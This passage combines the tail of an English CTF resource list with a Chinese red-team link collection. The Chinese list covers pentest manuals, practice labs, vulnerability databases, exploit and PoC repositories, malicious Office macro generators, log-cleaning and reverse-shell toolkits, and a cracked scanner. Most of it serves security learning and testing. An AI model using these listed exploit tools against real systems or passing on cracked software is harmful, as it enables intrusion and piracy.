challenge's source code, writeup and some idea explanation. All about Web. - [Pikachu](https://github.com/zhuifengshaonianhanlu/pikachu) - PHP web application with some common delibrated vulnerabilities. (in Chinese) ## Websites *Various general websites about and on CTF* - [Awesome CTF Cheatsheet](https://github.com/uppusaikiran/awesome-ctf-cheatsheet#awesome-ctf-cheatsheet-) - CTF Cheatsheet. - [CTF Time](https://ctftime.org/) - General information on CTF occuring around the worlds. - [Reddit Security CTF](http://www.reddit.com/r/securityctf) - Reddit CTF category. ## Wikis *Various Wikis available for learning about CTFs* - [Bamboofox](https://bamboofox.torchpad.com/) - Chinese resources to learn CTF - [bi0s Wiki](https://teambi0s.gitlab.io/bi0s-wiki/) - Wiki from team bi0s. - [CTF Cheatsheet](https://uppusaikiran.github.io/hacking/Capture-the-Flag-CheatSheet/) - CTF tips and tricks. - [CTF-Wiki](https://ctf-wiki.github.io/ctf-wiki/) - Open Wiki for beginners in CTFs (in Chinese and English) - [ISIS Lab](https://github.com/isislab/Project-Ideas/wiki) - CTF Wiki by Isis lab - [OpenToAll](http://wiki.opentoallctf.com/) - Open To All Knowledge Base ## Writeups Collections *Collections of CTF write-ups* - [0e85dc6eaf](https://github.com/0e85dc6eaf/CTF-Writeups) - Write-ups for CTF challenges by 0e85dc6eaf - [Captf](http://captf.com/) - Dumped CTF challenges and materials by psifertex. - [CTF write-ups (community)](https://github.com/ctfs/) - CTF challenges + write-ups archive maintained by the community. - [CTFTime Scrapper](https://github.com/abdilahrf/CTFWriteupScrapper) - Scraps all writeup from CTF Time and organize which to read first. - [HackThisSite](https://github.com/HackThisSite/CTF-Writeups) - CTF write-ups repo maintained by HackThisSite team. - [Mzfr](https://github.com/mzfr/ctf-writeups/) - CTF competition write-ups by mzfr - [pwntools writeups](https://github.com/Gallopsled/pwntools-write-ups) - A collection of CTF write-ups all using pwntools. - [SababaSec](https://github.com/SababaSec/ctf-writeups) - A collection of CTF write-ups by the SababaSec team - [Shell Storm](http://shell-storm.org/repo/CTF/) - CTF challenge archive maintained by Jonathan Salwan. - [Smoke Leet Everyday](https://github.com/smokeleeteveryday/CTF_WRITEUPS) - CTF write-ups repo maintained by SmokeLeetEveryday team. ## Keywords to explore > Dont' forget to translate these Keywords into your Native language * tips - ex: exploit tips php / exploit tips java / exploit tips python * tricks * cheatsheet - ex: php security cheatsheet * checklist - ex: php security checklist * bypass - ex: bypass WAF / bypass sql injection prevention * vulnerability database - find known vulnerabilities related to challenge's runtime * **Feature Keywords in CTF challenges** - find known or similar challenges and writeups # Delibrated Vulnerable App ## Java - [CSPF-Founder/JavaVulnerableLab](https://github.com/CSPF-Founder/JavaVulnerableLab) - this app is intended for the Java Programmers and other people who wish to learn about Web application vulnerabilities and write secure code - [find-sec-bugs/juliet-test-suite](https://github.com/find-sec-bugs/juliet-test-suite) - a collection of test cases in the Java language. It contains examples for 112 different CWEs. - [Web Goat](https://github.com/WebGoat/WebGoat) - a deliberately insecure web application maintained by OWASP designed to teach web application security lessons ## PHP - [ajinabraham/Vulnerable_Tornado_App](https://github.com/ajinabraham/Vulnerable_Tornado_App) - [Damn Vulnerable Web Application](http://www.dvwa.co.uk/) - PHP/MySQL web application that is damn vulnerable - [mddanish/Vulnerable-OTP-Application](https://github.com/mddanish/Vulnerable-OTP-Application) - Vulnerable OTP Application created using PHP & Google OTP ## Python - [nVisium/django.nV](https://github.com/nVisium/django.nV) - a purposefully vulnerable Django application provided by [nVisium](https://www.nvisium.com/) - [portantier/vulpy](https://github.com/portantier/vulpy) - a web application developed in Python / Flask / SQLite that has two faces ## NodeJS - [DVNA](https://github.com/appsecco/dvna) - a Damn Vulnerable NodeJS Application which is powered by commonly used libraries such as express, passport, sequelize, etc. - [Juice Shop CTF](https://github.com/bkimminich/juice-shop-ctf) - Scripts and tools for hosting a CTF on [OWASP Juice Shop](https://www.owasp.org/index.php/OWASP_Juice_Shop_Project) easily. - [OWASP/NodeGoat](https://github.com/OWASP/NodeGoat) - The OWASP NodeGoat project provides an environment to learn how OWASP Top 10 security risks apply to web applications developed using Node.js and how to effectively address them ## Android - [abhi-r3v0/EVABS](https://github.com/abhi-r3v0/EVABS) - an open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners - [t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) - an intentionally vulnerable Android application for Frida Demonstration ## Real World DVA - [Medicean/VulApps](https://github.com/Medicean/VulApps) - yet another ***vulhub*** like project (in Chinese) - [nixawk/labs](https://github.com/nixawk/labs) - a collection of some CVE vulnerable apps / samples / PoCs - [vulhub](https://github.com/vulhub/vulhub) - Pre-Built Vulnerable Environments Based on Docker-Compose https://vulhub.org ### LICENSE CC0 :)
***项目简介*** 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 *** # 相关资源列表 - https://mitre-attack.github.io/ mitre科技机构对攻击技术的总结wiki - https://huntingday.github.io MITRE | ATT&CK 中文站 - https://arxiv.org 康奈尔大学(Cornell University)开放文档 - http://www.owasp.org.cn/owasp-project/owasp-things OWASP项目 - http://www.irongeek.com/i.php?page=security/hackingillustrated 国内外安全大会相关视频与文档 - https://github.com/knownsec/KCon KCon大会文章PPT - https://github.com/SecWiki/sec-chart 各种相关安全思维导图集合 - https://github.com/knownsec/RD_Checklist 知道创宇技能列表 - https://github.com/ChrisLinn/greyhame-2017 灰袍技能书2017版本 - https://github.com/Hack-with-Github/Awesome-Hacking GitHub万星推荐:黑客成长技术清单 - https://github.com/k4m4/movies-for-hackers 安全相关电影 - https://github.com/jaredthecoder/awesome-vehicle-security 一个用于了解车辆安全和汽车黑客的资源清单 - https://www.jianshu.com/p/852e0fbe2f4c 安全产品厂商分类 - https://www.reddit.com/r/Python/comments/a81mg3/the_entire_mit_intro_computer_science_class_using/ 麻省理工机器学习视频 - https://github.com/fxsjy/jieba py,结巴中文分词 - https://github.com/thunlp/THULAC-Python py,清华中文分词 - https://github.com/lancopku/PKUSeg-python py3,北大中文分词 - https://github.com/fengdu78/Coursera-ML-AndrewNg-Notes 吴恩达机器学习python笔记 - https://paperswithcode.com/sota 机器学习具体项目、演示、代码 - https://github.com/duoergun0729/nlp 一本开源的NLP(神经语言程序学)入门书籍 - https://www.freebuf.com/articles/web/195304.html 一句话木马的套路 ## 攻防测试手册 - https://micropoor.blogspot.com/2019/01/php8.html PHP安全新闻早8点课程系列高持续渗透--Microporor - https://github.com/Micropoor/Micro8 Microporor高级攻防100课 - https://github.com/maskhed/Papers 包含100课等经典攻防教材、安全知识 - https://github.com/infosecn1nja/AD-Attack-Defense 红蓝方攻防手册 - https://github.com/yeyintminthuhtut/Awesome-Red-Teaming 优秀红队资源列表 - https://github.com/foobarto/redteam-notebook 红队标准渗透测试流程+常用命令 - https://github.com/tom0li/collection-document 文章收集:安全部、SDL、src、渗透测试、漏洞利用 - https://github.com/kbandla/APTnotes 各种公开的文件和相关的APT笔记,还有软件样本 - https://wizardforcel.gitbooks.io/web-hacking-101/content Web Hacking 101 中文版 - https://techvomit.net/web-application-penetration-testing-notes/ web渗透测试笔记 - https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表 - http://pentestmonkey.net/category/cheat-sheet 渗透测试常见条目 - https://github.com/demonsec666/Security-Toolkit 渗透攻击链中常用工具及使用场景 - https://github.com/Kinimiwar/Penetration-Testing 渗透测试方向优秀资源收集 - https://github.com/jshaw87/Cheatsheets 渗透测试/安全秘籍/笔记 ### 内网安全文档 - https://attack.mitre.org/wiki/Lateral_Movement mitre机构对横向移动的总结 - https://payloads.online/archivers/2018-11-30/1 彻底理解Windows认证 - 议题解读 - https://github.com/klionsec/klionsec.github.io 内网大牛的学习历程 - https://github.com/l3m0n/pentest_study 从零开始内网渗透学习 - https://github.com/Ridter/Intranet_Penetration_Tips 内网渗透TIPS ### 学习手册相关资源 - https://github.com/HarmJ0y/CheatSheets 多个项目的速查手册(Beacon / Cobalt Strike,PowerView,PowerUp,Empire和PowerSploit) - https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版 - https://github.com/louchaooo/kali-tools-zh kali下工具使用介绍手册 - https://www.offensive-security.com/metasploit-unleashed/ kali出的metasploit指导笔记 - http://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/ hydra使用手册 - https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南 - https://zhuanlan.zhihu.com/p/26618074 Nmap扩展脚本使用方法 - https://somdev.me/21-things-xss/ XSS的21个扩展用途 - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ sql注入sheet表 - https://sqlwiki.netspi.com/ 你要的sql注入知识点都能找到 - https://github.com/kevins1022/SQLInjectionWiki 一个专注于聚合和记录各种SQL注入方法的wiki - https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门 - https://wizardforcel.gitbooks.io/asani/content 浅入浅出Android安全 中文版 - https://wizardforcel.gitbooks.io/lpad/content Android 渗透测试学习手册 中文版 - https://github.com/writeups/ios ios漏洞writeup笔记 - http://blog.safebuff.com/2016/07/03/SSRF-Tips/ ssrf漏洞利用手册 ### checklist和基础安全知识 - https://book.yunzhan365.com/umta/rtnp/mobile/index.html 网络安全科普小册子 - http://sec.cuc.edu.cn/huangwei/textbook/ns/ 网络安全电子版教材。中传信安课程网站 - https://mitre.github.io/attack-navigator/enterprise/ mitre机构att&ck入侵检测条目 - https://github.com/danielmiessler/SecLists 表类型包括用户名,密码,URL,敏感数据模式,模糊测试负载,Web shell等 - https://github.com/GitGuardian/APISecurityBestPractices api接口测试checklist - https://github.com/ym2011/SecurityManagement 分享在建设安全管理体系、ISO27001、等级保护、安全评审过程中的点点滴滴 - https://mp.weixin.qq.com/s/O36e0gl4cs0ErQPsb5L68Q 区块链,以太坊智能合约审计 CheckList - https://github.com/slowmist/eos-bp-nodes-security-checklist 区块链,EOS bp nodes security checklist(EOS超级节点安全执行指南) - https://xz.aliyun.com/t/2089 金融科技SDL安全设计checklist - https://github.com/juliocesarfort/public-pentesting-reports 由几家咨询公司和学术安全组织发布的公共渗透测试报告的列表。 - http://www.freebuf.com/articles/network/169632.html 开源软件创建SOC的一份清单 - https://github.com/0xRadi/OWASP-Web-Checklist owasp网站检查条目 - https://www.securitypaper.org/ SDL开发安全生命周期管理 - https://github.com/Jsitech/JShielder linux下服务器一键加固脚本 - https://github.com/wstart/DB_BaseLine 数据库基线检查工具 ### 产品设计文档 - https://www.freebuf.com/sectool/135032.html 构建一个高交互型的难以发现的蜜罐 - https://bloodzer0.github.io/ossa/ 利用开源文件进行开源安全架构.主机、扫描器、端口、日志、防护设备等 - https://github.com/dvf/blockchain 用Python从零开始创建区块链 - https://github.com/crazywa1ker/DarthSidious-Chinese 从0开始你的域渗透之旅,DarthSidious 中文版 - https://paper.seebug.org/772/ 如何使用 KittyFuzzer 结合 ISF 中的工控协议组件对工控协议进行 Fuzz ### 学习靶场 - https://www.blackmoreops.com/2018/11/06/124-legal-hacking-websites-to-practice-and-learn/ 124个合法的可以练习Hacking技术的网站 - https://www.zhihu.com/question/267204109 学web安全去哪里找各种各样的靶场? - https://www.vulnhub.com 许多ctf靶机汇总 - https://www.wechall.net 世界知名ctf汇总交流网站 - https://www.xssgame.com 谷歌XSS挑战 - http://xss.tv 在线靶场挑战 - https://www.hackthebox.eu 在线靶场挑战 - https://www.root-me.org 在线靶场挑战 - http://www.itsecgames.com bWAPP,包含 100多种漏洞环境 - https://github.com/c0ny1/vulstudy 多种漏洞复现系统的docker汇总 - https://github.com/bkimminich/juice-shop 常见web安全实验靶场市场 - https://github.com/ethicalhack3r/DVWA web安全实验靶场 - https://www.freebuf.com/articles/web/123779.html 新手指南:DVWA-1.9全级别教程 - https://github.com/78778443/permeate php,常见漏洞靶场 - https://github.com/gh0stkey/DoraBox php,常见漏洞靶场 - https://github.com/stamparm/DSVW py2,常见漏洞靶场 - https://github.com/amolnaik4/bodhi py,常见漏洞靶场 - https://github.com/Safflower/Solve-Me php,韩国一个偏代码审计的ctf靶场源码 - https://github.com/WebGoat/WebGoat 一键jar包,web安全实验靶场 - https://github.com/Audi-1/sqli-labs 基于SQLite的sql注入学习靶场 - https://github.com/lcamry/sqli-labs 通过sqli-labs演示mysql相关的注入手法 - https://github.com/c0ny1/upload-labs 一个帮你总结所有类型的上传漏洞的靶场 - https://github.com/LandGrey/upload-labs-writeup upload-labs指导手册 - https://github.com/Go0s/LFIboomCTF 本地文件包含漏洞&&PHP利用协议&&实践源码 - https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/ 一个虚拟机文件用于linux提权练习 - https://github.com/OWASP/igoat 适用于ios应用程序测试和安全性的学习工具 - https://github.com/prateek147/DVIA-v2 适用于ios应用程序测试和安全性的学习工具 - https://github.com/rapid7/metasploitable3 metasploit练习系统 - https://github.com/rapid7/metasploit-vulnerability-emulator 基于perl的metasploit模拟环境,练习操作 - https://github.com/chryzsh/DarthSidious AD域环境的搭建、渗透、防护 - https://github.com/c0ny1/xxe-lab 一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo ### 漏洞复现 - https://github.com/vulhub/vulhub Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,执行两条命令即可编译、运行一个完整的漏洞靶场镜像 - https://github.com/Medicean/VulApps 收集各种漏洞环境,为方便使用,统一采用 Dockerfile 形式。同时也收集了安全工具环境。 - https://github.com/bingohuang/docker-labs 制作在线docker平台 ### 开源漏洞库 - https://wooyun.kieran.top/#!/ 2016年之前,乌云Drops文章,公开漏洞详情文章 - https://wooyun.js.org/ 2016年之前,乌云Drops文章,公开漏洞详情文章 - https://dvpnet.io/list/index/state/3 公开漏洞详情文章 - https://sec.ly.com/bugs 同程安全公开漏洞详情文章 - http://ics.cnvd.org.cn 中国国家工控漏洞库 - https://ics-cert.us-cert.gov/advisories 美国国家工控漏洞库 - http://www.nsfocus.net/index.php?act=sec_bug 绿盟漏洞库,含工控 - http://ivd.winicssec.com/ 威努特工控漏洞库 - http://cve.scap.org.cn/view/ics CVE中文工控漏洞库 - https://cve.mitre.org/cve/search_cve_list.html 美国MITRE公司负责维护的CVE漏洞库 - https://www.exploit-db.com 美国Offensive Security的漏洞库 - https://nvd.nist.gov/vuln/search 美国国家信息安全漏洞库 # 工具包集合 - http://www.4hou.com/web/11241.html 史上最全攻击模拟工具盘点 - https://github.com/infosecn1nja/Red-Teaming-Toolkit 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、清理痕迹 - https://github.com/toolswatch/blackhat-arsenal-tools 黑帽大会工具集 - https://www.cnblogs.com/k8gege K8哥哥工具包集合。解压密码Kk8team,Kk8gege - https://github.com/n00py/ReadingList/blob/master/gunsafe.txt 安全工具集 - https://github.com/Ridter/Pentest 安全工具集 - https://github.com/redcanaryco/atomic-red-team win、linux、mac等多方面apt利用手段、技术与工具集 - https://github.com/Cooolis/Cooolis.github.io Cooolis是一个操作系统命令技巧备忘录,https://cooolis.payloads.online - https://github.com/LOLBAS-Project/LOLBAS 常见的渗透测试利用的脚本与二进制文件集合 - https://www.owasp.org/index.php/File:CSRFTester-1.0.zip csrf验证工具 - https://github.com/ufrisk/MemProcFS 以访问文件系统的方式访问物理内存, 可读写, 有易于使用的接口. 当前支持Windows - https://github.com/vletoux/SpoolerScanner 检测 Windows 远程打印机服务是否开启的工具 - https://github.com/sirpsycho/firecall 直接向CiscoASA防火墙发送命令, 无需登录防火墙后再做修改 - https://github.com/jboss-javassist/javassist 能够操作字节码框架,通过它我们能很轻易的修改class代码文件 - https://github.com/ConsenSys/mythril-classic 用于以太坊智能协议的安全分析工具 - https://github.com/a13xp0p0v/kconfig-hardened-check 用于检查 Linux 内核配置中的安全加固选项的脚本 - https://github.com/lionsoul2014/ip2region ip地址定位库,支持python3等多接口。类比geoip - https://github.com/m101/hsploit 基于rust的HEVD 漏洞利用程序 - https://github.com/ticarpi/jwt_tool 针对json web token的检测 - https://github.com/clr2of8/DPAT 域密码配置审计 - https://github.com/chenjj/CORScanner 域解析漏洞,跨域扫描器 - https://github.com/dienuet/crossdomain 域解析漏洞,跨域扫描器 - https://github.com/sfan5/fi6s ipv6端口快速扫描器 - https://github.com/lavalamp-/ipv666 go,ipv6地址枚举扫描 - https://github.com/commixproject/commix 命令注入漏洞扫描 - https://github.com/Graph-X/davscan DAVScan是一款快速轻便的webdav扫描仪,旨在发现DAV启用的Web服务器上的隐藏文件和文件夹 - https://github.com/jcesarstef/dotdotslash 目录遍历漏洞测试 - https://github.com/P3GLEG/WhaleTail 根据docker镜像生成成dockerfile - https://github.com/cr0hn/dockerscan docker扫描工具 - https://github.com/utiso/dorkbot 通过定制化的谷歌搜索引擎进行漏洞页面搜寻及扫描 - https://github.com/NullArray/DorkNet 基于搜索引擎的漏洞网页搜寻 - https://github.com/panda-re/lava 大规模向程序中植入恶意程序 - https://github.com/woj-ciech/Danger-zone 关联域名、IP 和电子邮件地址之间的数据并将其可视化输出 - https://github.com/securemode/DefenderKeys 枚举出被 Windows Defender 排除扫描的配置 - https://github.com/D4Vinci/PasteJacker 剪贴板劫持利用工具 - https://github.com/JusticeRage/freedomfighting 日志清理、文件共享、反向shell、简单爬虫工具包 - https://github.com/gh0stkey/PoCBox 漏洞测试验证辅助平台,SONP劫持、CORS、Flash跨域资源读取、Google Hack语法生成、URL测试字典生成、JavaScript URL跳转、302 URL跳转 - https://github.com/jakubroztocil/httpie http调试工具,类似curl,功能更完善 - https://www.getpostman.com/ http调试工具,带界面 ## 漏洞收集与exp、poc利用 - https://github.com/Lcys/Python_PoC python3的poc、exp快速编写模板,有众多模范版本 - https://github.com/raminfp/linux_exploit_development linux漏洞利用开发手册 - https://github.com/mudongliang/LinuxFlaw 包含linux下软件漏洞列表 - https://github.com/coffeehb/Some-PoC-oR-ExP 各种漏洞poc、Exp的收集或编写 - https://github.com/userlandkernel/plataoplomo Sem Voigtländer 公开其发现的 iOS 中各种漏洞,包括(Writeup/POC/Exploit) - https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/check_icmp_dos.py CVE-2018-4407,macos/ios缓冲区溢出可导致系统崩溃 - https://github.com/vulnersCom/getsploit py2,仿照searchsploit通过各种数据库的官方接口进行payload的查找 - https://github.com/SecWiki/CMS-Hunter CMS漏洞测试用例集合 - https://github.com/Mr5m1th/0day 各种开源CMS 各种版本的漏洞以及EXP - https://github.com/w1109790800/penetration CMS新老版本exp与系统漏洞搜集表 - https://github.com/blacknbunny/libSSH-Authentication-Bypass CVE-2018-10933,libssh服务端身份验证绕过 - https://github.com/leapsecurity/libssh-scanner CVE-2018-10933,libssh服务端身份验证绕过 - https://github.com/anbai-inc/CVE-2018-4878 Adobe Flash Exploit生成payload - https://github.com/RetireJS/grunt-retire 扫描js扩展库的常见漏洞 - https://github.com/coffeehb/SSTIF 服务器端模板注入漏洞的半自动化工具 - https://github.com/tijme/angularjs-csti-scanner 探测客户端AngularJS模板注入漏洞工具 - https://github.com/blackye/Jenkins Jenkins漏洞探测、用户抓取爆破 - https://github.com/epinna/tplmap 服务器端模板注入漏洞检测与利用工具 - https://github.com/irsdl/IIS-ShortName-Scanner Java,IIS短文件名暴力枚举漏洞利用工具 - https://github.com/lijiejie/IIS_shortname_Scanner py2,IIS短文件名漏洞扫描 - https://github.com/rudSarkar/crlf-injector CRLF注入漏洞批量扫描 - https://github.com/hahwul/a2sv SSL漏洞扫描,例如心脏滴血漏洞等 - https://github.com/jagracey/Regex-DoS RegEx拒绝服务扫描器 - https://github.com/Bo0oM/PHP_imap_open_exploit 利用imap_open绕过php exec函数禁用 - https://www.anquanke.com/post/id/106488 利用mysql服务端恶意配置读取客户端文件,(如何利用MySQL LOCAL INFILE读取客户端文件,Read MySQL Client's File,【技术分享】从MySQL出发的反击之路) - https://www.waitalone.cn/awvs-poc.html CVE-2015-4027,AWVS10命令执行漏洞 - http://an7isec.blogspot.com/2014/04/pown-noobs-acunetix-0day.html Pwn the n00bs - Acunetix 0day,awvs8命令执行漏洞 - https://github.com/numpy/numpy/issues/12759 科学计算框架numpy命令执行RCE漏洞 - https://github.com/petercunha/Jenkins-PreAuth-RCE-PoC jenkins远程命令执行 - https://github.com/WyAtu/CVE-2018-20250 WinRar执行漏洞加使用介绍 ### 物联网路由工控漏洞收集 - https://github.com/yassineaboukir/CVE-2018-0296 测试思科ASA路径穿越漏洞,可获取系统详细信息 - https://github.com/seclab-ucr/tcp_exploit 利用tcp漏洞使无线路由器产生隐私泄露 - https://github.com/ezelf/CVE-2018-9995_dvr_credentials CVE-2018-9995摄像头路由,Get DVR Credentials ### java反序列化漏洞收集 - https://github.com/brianwrf/hackUtils java反序列化利用 - https://github.com/GoSecure/break-fast-serial 借助DNS解析来检测Java反序列化漏洞工具 - https://github.com/s1kr10s/Apache-Struts-v3 Apache-Struts漏洞利用工具 - https://github.com/iBearcat/S2-057 struts2 CVE-2018-11776 漏洞检测工具 - https://github.com/Ivan1ee/struts2-057-exp struts2-057利用脚本 - https://github.com/theLSA/s2sniper struts2漏洞的检测工具 - https://github.com/Lucifer1993/struts-scan 批量检测struts命令执行漏洞 - https://github.com/lijiejie/struts2_045_scan Struts2-045漏洞批量扫描工具 - https://github.com/riusksk/StrutScan 基于perl的strut2的历史漏洞扫描 - https://github.com/Coalfire-Research/java-deserialization-exploits java反序列化漏洞收集 - https://github.com/quentinhardy/jndiat weblogic漏洞利用工具 - https://github.com/jas502n/CVE-2018-3191 Weblogic CVE-2018-3191远程代码命令执行 - https://github.com/pyn3rd/CVE-2018-3245 weblogic cve-2018-2893与cve-2018-3245远程代码命令执行 - https://github.com/NickstaDB/BaRMIe 用于Java Remote Method Invocation服务的工具/rmi的枚举与远程命令执行 - https://github.com/joaomatosf/jexboss JBoss和其他java序列化漏洞验证和开发工具 - https://github.com/frohoff/ysoserial java反序列化利用工具 ### 版本管理平台漏洞收集 - https://github.com/shengqi158/svnhack .svn文件夹泄漏利用工具 - https://www.waitalone.cn/seay-svn-poc-donw-20140505.html Seay-Svn源代码泄露漏洞利用工具,2014-05-05版 - https://github.com/BugScanTeam/GitHack .git文件利用工具,lijiejie改进版 - https://github.com/lijiejie/GitHack .git文件利用工具 ### MS与Office漏洞收集 - https://github.com/Lz1y/CVE-2017-8759 .NET Framework换行符漏洞,CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)https://www.freebuf.com/vuls/147793.html - https://github.com/WyAtu/CVE-2018-8581 Exchange使用完成添加收信规则的操作进行横向渗透和提权漏洞 - https://github.com/dafthack/MailSniper PS,用于在Microsoft Exchange环境搜索电子邮件查找特定邮件(密码、网络架构信息等) - https://github.com/sensepost/ruler GO,通过MAPI / HTTP或RPC / HTTP协议远程与Exchange服务器进行交互,通过客户端Outlook功能远程获取shell - https://github.com/3gstudent/Smbtouch-Scanner 扫描内网永恒之蓝ETERNAL445SMB系列漏洞 - https://github.com/smgorelik/Windows-RCE-exploits windows命令执行RCE漏洞POC样本,分为web与文件两种形式 - https://github.com/3gstudent/CVE-2017-8464-EXP CVE-2017-8464,win快捷方式远程执行漏洞 - https://github.com/Lz1y/CVE-2018-8420 Windows的msxml解析器漏洞可以通过ie或vbs执行后门 - https://www.anquanke.com/post/id/163000 利用Excel 4.0宏躲避杀软检测的攻击技术分析 - https://github.com/BuffaloWill/oxml_xxe XXE漏洞利用 - https://thief.one/2017/06/20/1/ 浅谈XXE漏洞攻击与防御 - https://github.com/thom-s/docx-embeddedhtml-injection word2016,滥用Word联机视频特征执行恶意代码poc - https://blog.cymulate.com/abusing-microsoft-office-online-video word2016,滥用Word联机视频特征执行恶意代码介绍 - https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads 无需开启宏即可在word文档中利用DDE执行命令 - http://www.freebuf.com/articles/terminal/150285.html 无需开启宏即可在word文档中利用DDE执行命令利用 - https://github.com/Ridter/CVE-2017-11882 利用word文档RTF获取shell,https://evi1cg.me/archives/CVE_2017_11882_exp.html - https://github.com/Lz1y/CVE-2017-8759 利用word文档hta获取shell,http://www.freebuf.com/vuls/147793.html - https://fuping.site/2017/04/18/CVE-2017-0199漏洞复现过程 WORD RTF 文档,配合msf利用 - https://github.com/tezukanice/Office8570 利用ppsx幻灯片远程命令执行,https://github.com/rxwx/CVE-2017-8570 - https://github.com/0x09AL/CVE-2018-8174-msf 目前支持的版本是 32 位 IE 浏览器和 32 位 office。网页访问上线,浏览器关闭,shell 依然存活,http://www.freebuf.com/vuls/173727.html - http://www.4hou.com/technology/9405.html 在 Office 文档的属性中隐藏攻击载荷 - https://evi1cg.me/archives/Create_PPSX.html 构造PPSX钓鱼文件 - https://github.com/enigma0x3/Generate-Macro PowerShell脚本,生成含有恶意宏的Microsoft Office文档 - https://github.com/mwrlabs/wePWNise 生成独立于体系结构的VBA代码,用于Office文档或模板,并自动绕过应用程序控制 - https://github.com/curi0usJack/luckystrike 基于ps,用于创建恶意的Office宏文档 - https://github.com/sevagas/macro_pack MS Office文档、VBS格式、快捷方式payload捆绑 - https://github.com/khr0x40sh/MacroShop 一组通过Office宏传递有效载荷的脚本 ### 相关工具拓展插件 - https://github.com/AntSword-Store/ 中国蚁剑插件市场 #### kali环境下拓展插件 - https://github.com/secforce/sparta py,图形化应用程序联动Nmap、Nikto、Hydra等工具 - https://github.com/Manisso/fsociety linux下类似于kali的工具包一键安装工具 - https://github.com/LionSec/katoolin 使用linux服务器自动安装kali工具包 - https://github.com/skavngr/rapidscan py2,simple,联动kali下工具,漏洞扫描工具 - https://github.com/koenbuyens/kalirouter 将kali设置为一个路由流量分析系统 ### Nessus相关工具拓展插件 - https://www.tenable.com/downloads/nessus - https://github.com/se55i0n/Awvs_Nessus_Scanner_API 扫描器Awvs 11和Nessus 7 Api利用脚本 - https://github.com/DanMcInerney/msf-autoshell 配合nessus扫描结果进行msf攻击 - https://github.com/MooseDojo/apt2 联动nmap、nessus等工具进行安全测试 #### awvs相关工具拓展插件 - https://www.52pojie.cn/thread-214819-1-1.html awvs10.5开发框架破解版 - https://github.com/fnmsd/awvs_script_decode awvs10.5规则scripts解密版,SDK,开发手册 - https://github.com/NS-Sp4ce/AWVS11.X-Chinese-Version awvs11汉化包 #### burpsuit相关工具拓展插件 - https://github.com/PortSwigger burpsuite官方插件库 - https://github.com/snoopysecurity/awesome-burp-extensions awesome系列之burp拓展 - https://github.com/d3vilbug/HackBar 集成hackbar - https://github.com/PortSwigger/turbo-intruder 比Burp自带的Intruder 更快,一分钟打1.61万次请求 - https://github.com/Ebryx/AES-Killer burp插件,破解aes加密的插件 - https://github.com/bugcrowd/HUNT 可以将burpsuite扫描器功能扩展的更加强大,同时支持zapproxy扩展 - https://github.com/wagiro/BurpBounty burp插件增强主动与被动扫描功能 - https://github.com/nccgroup/BurpSuiteHTTPSmuggler Burp拓展, 使用几种技巧绕过WAF - https://github.com/PortSwigger/command-injection-attacker burp插件,命令注入漏洞检测 - https://github.com/nccgroup/freddy burp插件,自动识别Java/.NET 应用程序中的反序列化漏洞 - https://github.com/modzero/interestingFileScanner burp插件,增强敏感文件扫描 - https://github.com/summitt/Burp-Non-HTTP-Extension burp插件,布置dns服务器抓取流量 - https://github.com/ilmila/J2EEScan burp拓展,扫描J2EE应用 - https://github.com/JGillam/burp-co2 集成了sqlmap,菜刀,字典生成等 - https://github.com/swisskyrepo/SSRFmap burp插件,检测ssrf漏洞 #### sqlmap相关工具拓展插件 - https://github.com/codewatchorg/sqlipy burp与sqlmap联动插件 - https://github.com/Hood3dRob1n/SQLMAP-Web-GUI sqlmap的web gui - https://github.com/KINGSABRI/sqlmap-tamper-api 利用各种语言来编写sqlmapTamper - https://github.com/0xbug/SQLiScanner 一款基于sqlmapapi和Charles的被动SQL注入漏洞扫描工具 - https://github.com/fengxuangit/Fox-scan 基于sqlmapapi的主动和被动资源发现的漏洞扫描工具 - https://github.com/UltimateHackers/sqlmate 在sqlmap基础上增加了目录扫描、hash爆破等功能 - https://github.com/ysrc/GourdScanV2 ysrc出品的被动式漏洞扫描工具,基于sqlmapapi - https://github.com/zt2/sqli-hunter 基于sqlmapapi,ruby编写的漏洞代理型检测工具 - https://github.com/jesuiscamille/AutoSQLi 利用DorkNet,Googler, Ddgr, WhatWaf 和 sqlmap自动注入 #### nmap相关工具拓展插件 - https://github.com/Ullaakut/nmap GO,实现的Nmap调用库 - https://github.com/cldrn/nmap-nse-scripts NSE收集列表 - https://github.com/vulnersCom/nmap-vulners 使用nmap扫描常见的服务漏洞 - https://github.com/s4n7h0/Halcyon Nmap Script (NSE)IDE编辑器 - https://github.com/m4ll0k/AutoNSE NSE自动化利用 - https://github.com/Screetsec/Dracnmap shell,将Nmap复杂的命令进行一定程度的集成与简化,使新用户更加容易上手。 - https://github.com/cldrn/rainmap-lite Django,Web版Nmap,可以建立新的扫描服务器,允许用户从他们的手机/平板电脑/网络浏览器启动Nmap扫描 - https://github.com/trimstray/sandmap linux下将支持使用大量 Nmap 引擎进行网络和系统侦察的工具 - https://github.com/m0nad/HellRaiser 基于nmap的扫描器,与cve漏洞关联 - https://github.com/scipag/vulscan 基于nmap的高级漏洞扫描器,命令行环境使用 - https://github.com/Rev3rseSecurity/WebMap 将nmap的xml web展示器 - https://github.com/DanMcInerney/msf-autopwn 执行NMap扫描或读取扫描结果, 然后自动使用msf攻击包含常见漏洞的主机 #### metasploit相关工具拓展插件 - https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit 结合机器学习与msf的全自动测试工具 - https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL 一个可以创建SSL/TLS shell连接的脚本 